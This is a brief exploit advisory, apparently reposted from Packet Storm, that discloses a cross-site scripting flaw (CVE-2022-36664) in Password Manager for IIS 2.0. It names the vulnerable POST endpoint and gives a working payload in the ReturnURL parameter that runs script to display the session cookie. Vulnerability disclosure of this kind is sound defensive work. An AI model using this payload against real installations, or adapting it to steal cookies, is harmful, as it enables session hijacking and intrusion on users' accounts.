Password Manager For IIS 2.0 Cross Site Scripting

Password Manager for IIS version 2.0 suffers from a cross site scripting vulnerability.

SHA-256 | e3c574103dc808c4e03c80474d9c24b0be15c49bf81a66c6df2e5cdb5c3c0483

# Exploit Title: *XSS*
# Exploit Author: *VP4TR10T*
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/
<http://passwordmanager.adiscon.com/en/manual/>
*# Software Link:*http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
*# Version: *Version 2.0
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664

*Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1

HTTP Payload (Affected Parameter ):
ReturnURL=<script>alert(document.cookie)</script>

*Cordially,*

Source: packetstormsecurity.com

Exploit Collector

Search Exploit

Password Manager For IIS 2.0 Cross Site Scripting